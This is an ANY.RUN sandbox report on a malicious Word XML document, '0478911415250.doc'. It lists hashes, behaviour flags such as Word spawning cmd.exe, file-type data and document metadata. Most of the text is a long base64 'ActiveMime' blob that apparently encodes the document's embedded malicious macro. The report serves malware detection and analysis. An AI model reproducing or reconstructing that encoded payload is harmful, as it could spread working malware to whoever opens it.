analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0478911415250.doc

Full analysis: https://app.any.run/tasks/01d58134-e36c-406e-8bea-24d104894737
Verdict: Malicious activity
Analysis date: January 22, 2019, 11:58:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

0E1215AED06333D0329F17D9F9ACB259

SHA1:

3B980D33D286C421489B01674E1CDCA72A3E9A73

SHA256:

B97D4CF1B9BCBBC27F547EEAD8201A7120F5398F9BA4483ECB4A9F6CB990B300

SSDEEP:

3072:N+IOQsgzH0VbS4ORjb9SAjryK0yonOVRVDflFbwgfDJVNM+VaYxq6AlgyL:NLOqH0VGRkeyKHHlf3bwwc3Yxqr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3056)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3056)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3488)
      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 3696)
      • cmd.exe (PID: 2140)
    • Application launched itself

      • cmd.exe (PID: 4044)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3056)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:597.75pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 214874 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 004B252C
WordDocumentBodySectPRsidRDefault: 00A22A26
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: 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 CM+bDg2EzBmxL3dUV6XWsWglSJ/snH2pYu5muO+NsXO3nb0jAHfCc5xRtsNQQfogZy2flbp5Mjqd JZbxivgGTMm8/DijpdoAu3EypnJsOKYapbx+Z+py9VWlW1XMD67dH9KhiQ1TOboN4JTUr5sRZXrb sKKGpoc3ROM7A3vk6ObL1d4GVVFfu1oXJ+/uLlFMg/FXX9ml6hFzLLdNM43qzzVYsJZv02SJWVPT fferV/fDgL3pC3pETN26W1LV1mKckbtkRT1zS0nMNNtax9hOTYkYfWqroovMI/7aoB4NwH385OeC nUpbS0xUjCPgqK72zT2nhjtqTHWuMtwaLFL3H5qUjOlsWQ8uaOtMrZWCqWy4Df7w/bU9kgINtqQG jN+1XzHCq3pkVfePVB9ZmDBCuihUJnlFmWmD24s26X1DL336YtlodItVel/uftW01raaesiVI/TL sC6P5raH7hKPLj8zs1vS5ftzJ3p1SY5l+bXw1NVzN4QXxX4SXcYsiZQp6ltnS8eXpzY9/jl/WXDu Rn7rriNl7ColWtqd2nlmffxASBNTOd2GHlVXrBFqfgVTyX9eI6w/+0WYRrrgDW1NljBe8PgHcG/V 